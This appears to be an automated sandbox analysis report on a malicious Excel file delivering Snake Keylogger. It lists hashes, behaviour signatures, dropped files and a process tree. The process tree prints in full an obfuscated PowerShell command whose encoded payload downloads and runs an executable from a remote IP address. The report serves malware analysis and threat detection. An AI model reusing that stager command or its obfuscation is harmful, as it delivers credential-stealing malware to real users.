Analysis

  • max time kernel
    239s
  • max time network
    239s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 16:18

General

  • Target

    01102024_1618_01102024_TT SWIFT COPY.xls

  • Size

    866KB

  • MD5

    b74b9f77a4f538ff131c1be7ed01414f

  • SHA1

    25dac77c5cf517d87da4e2b936a294b88c73185d

  • SHA256

    c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1

  • SHA512

    19b80ce89cef0288e95081dab9da47df5afc20a958159cd9ac9f96177fb0e249ee713524f703109b3effaf1f48a28251187fd6b0c2eb59d4be870d0eb53932c7

  • SSDEEP

    24576:2VgVPjrLE7wRtMk8gwYRJBeMgBDDb/7zpkH/6:2yjXE7wRKzERJTgBXbm

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 4 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\01102024_1618_01102024_TT SWIFT COPY.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2484
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1172
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tssz11eh.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1452
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD55A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD559.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3024
        • C:\Users\Admin\AppData\Roaming\taskhostw.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1932
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2148

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    f5edf9a9217d40bcb643f69a9cbb5314

    SHA1

    4c187363c5f8f15b537291fde94b6980fc59efe7

    SHA256

    aedbe2a8dce9ef4a1a0fce002dd017175ad4306e52d093876d7f9cf97b181f0a

    SHA512

    c1d35c6bacf7b2c1f7d8d5d401a3a3db544fff9ceb8f274a4816e72c2fccb809bf4c706ed0242a219aae708fe7c1d7a1ddf02af8dffcb79e0095e3d0976b07c6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ccc68e45e0c28dd414c1867ca41d6060

    SHA1

    f6a06f428bba05c26d23e1854cd5a55c5372ba55

    SHA256

    631c6a8889b24afbb4ec13faf98fd4bba76e6ee8a96c593db40c57c958fa7aa0

    SHA512

    a7dddbd01aa3321e91d769f337e8e6bd56674e1a59292e327fda60cf2c6835f00ef4c5f418023f982bc489dc3fb75b92c92463f8c1595753288655612d8dc214

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    0edf47a7b549b147d3df68617b0b54dc

    SHA1

    378a131efaca8aa1d65d2ab330c6c288397b7cdb

    SHA256

    02de0a3e939221b39f71f99958ef9d5951fe1016e536b54b87c4e66ccca66de6

    SHA512

    ae2096a959c891e651431ee990bdf29abfc44bb999b2868e00b897ab315b4e57ac547cc78b5f50e33f2030cda8337ff56c39a2d4cd7f20ce1f73c681c8d1bcff

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40WV1DY9\niceworkwitheverybody[1].hta

    Filesize

    8KB

    MD5

    46f7566c298cdc31ac0c0f7c7800d02e

    SHA1

    7ccaa47baaec50720f0f6cbccfff28947eee0d59

    SHA256

    4ac90b298cf34de897cee2147b6f3feb9236afdaa085f45c8d43dfdbf154a492

    SHA512

    53b97bd148afe1d3eda168418f0abcc75a7213b5339d1f481335d025a1cf7a84205b456e5bf7cf87bfd29bb12baf4c780274e4a7be3b8ba92eaa2e3ad4fea285

  • C:\Users\Admin\AppData\Local\Temp\CabCCB1.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESD55A.tmp

    Filesize

    1KB

    MD5

    6bed8a86a8cc1937bdf82ba6106a099c

    SHA1

    611d076d7c611e94031698e96a5c6609af95831d

    SHA256

    c9edfac4bc2052321d7c815879e99ef513b51c4875e05c321aa9e21d157d3234

    SHA512

    0c7b8f6b9a3f5b76472fce75fb6a8638ae6a1d51d9389c4c90ffabd6129ee1d8cd7904b0933bd106168a0c5b4d150b0014db4bf2b7eadef408504f09a7c0d358

  • C:\Users\Admin\AppData\Local\Temp\tssz11eh.dll

    Filesize

    3KB

    MD5

    d065f21ee45fb44e6f13a5d08b69e91b

    SHA1

    3753b81ad9962584ee031ae7beea62575bc03a8e

    SHA256

    7181d4a69cb6d720c124374b64b13f3a2d82250ee82acc645d2d2da8307cc6e9

    SHA512

    2303d660ae558a889299e242f8c7bb445b0123e8bdbac706e356addf9189519f5dec5a42672031848649f79ae0022f91ef45c7b017dbdbf8ef90b80815210045

  • C:\Users\Admin\AppData\Local\Temp\tssz11eh.pdb

    Filesize

    7KB

    MD5

    703ff8e998784713966e32fceba43691

    SHA1

    e49b0f8ae82068c4012fa684c3a58ff9442b4f9b

    SHA256

    c0e49ceef513c31f9e90e56c99592b066ebdec6add7eae1e7761aad5d96d1fb1

    SHA512

    6ab75df60129d91816492ed03a25b0ed3de3f0d583ae678764be64704b3cedc6463974b3e457ff96c1362a7d60d14d3a3c15b24a71bb0b8a96b62433a23dbc64

  • C:\Users\Admin\AppData\Roaming\taskhostw.exe

    Filesize

    927KB

    MD5

    72489275d4647bac97371516cc034a56

    SHA1

    154f42f5b5b2dee0407813f4b86ebc3b75313e89

    SHA256

    2ef8baaa2ea5cbf4bc00e9435c8191b1e57470a021819314692c9a13f26e5e82

    SHA512

    18dd73769d62999c7cd408377ca374b0df71a59703f810ead593ea37c49280c4b1f03b0192371aef4750dba60a25b26e2dcf44024ec13bf520e83740d904fc6c

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCD559.tmp

    Filesize

    652B

    MD5

    2356ad395e1f31631e6e855ca978b811

    SHA1

    3155f1f05ec484e75c0870fb5deadd782dc12794

    SHA256

    9e4b71087b7240b9cf5b7c26babba859a9d97712a1ba20d319d1578b7a44e052

    SHA512

    bc1918f3ae339a123bc6a6856193c87ec4a10f389d1a4edaa2c4bb46c693566a9cfb189a9da70a1aea04aec10f020d3a1d5a9e4d2872948a58581269d16ad1dd

  • \??\c:\Users\Admin\AppData\Local\Temp\tssz11eh.0.cs

    Filesize

    463B

    MD5

    26586cfd3feae7a8042b855cf878e0b2

    SHA1

    fd8d93697c49047ddbcaaee8475061a4894a3906

    SHA256

    0374876ae0666d1d4296d2d500351e292b0ec565b31aac339abf1c551b2a26bd

    SHA512

    942f19de8f09985f9f39724b270bca2fe2c29b96ff1cf4db9fdb961321b3442b5266aaa437ed3f87c94e60e7c7f6f84b3bee4bd810284800cde7d53cbf6a84c6

  • \??\c:\Users\Admin\AppData\Local\Temp\tssz11eh.cmdline

    Filesize

    309B

    MD5

    57a5a180d9356b745b1a2e88c82ab476

    SHA1

    53592c16665d355ec24bb840ea6ad817d90a277e

    SHA256

    d81d35adf3d919b54c73a79b5fcadfaec69f3e6c0874682760be4c684e4f151d

    SHA512

    ac451efd6554dd0db9abaea485cb3c598c243763c2b1052994f71afaf2fc6a1c8f60cdd1dfe01f558876078e0f0574b3b7c080022b4e8dc02322f0cc4fa9bb9f

  • memory/2148-66-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

  • memory/2148-74-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

  • memory/2148-71-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

  • memory/2148-67-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

  • memory/2484-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2484-1-0x000000007206D000-0x0000000072078000-memory.dmp

    Filesize

    44KB

  • memory/2484-19-0x0000000002D10000-0x0000000002D12000-memory.dmp

    Filesize

    8KB

  • memory/2484-75-0x000000007206D000-0x0000000072078000-memory.dmp

    Filesize

    44KB

  • memory/2784-18-0x00000000003D0000-0x00000000003D2000-memory.dmp

    Filesize

    8KB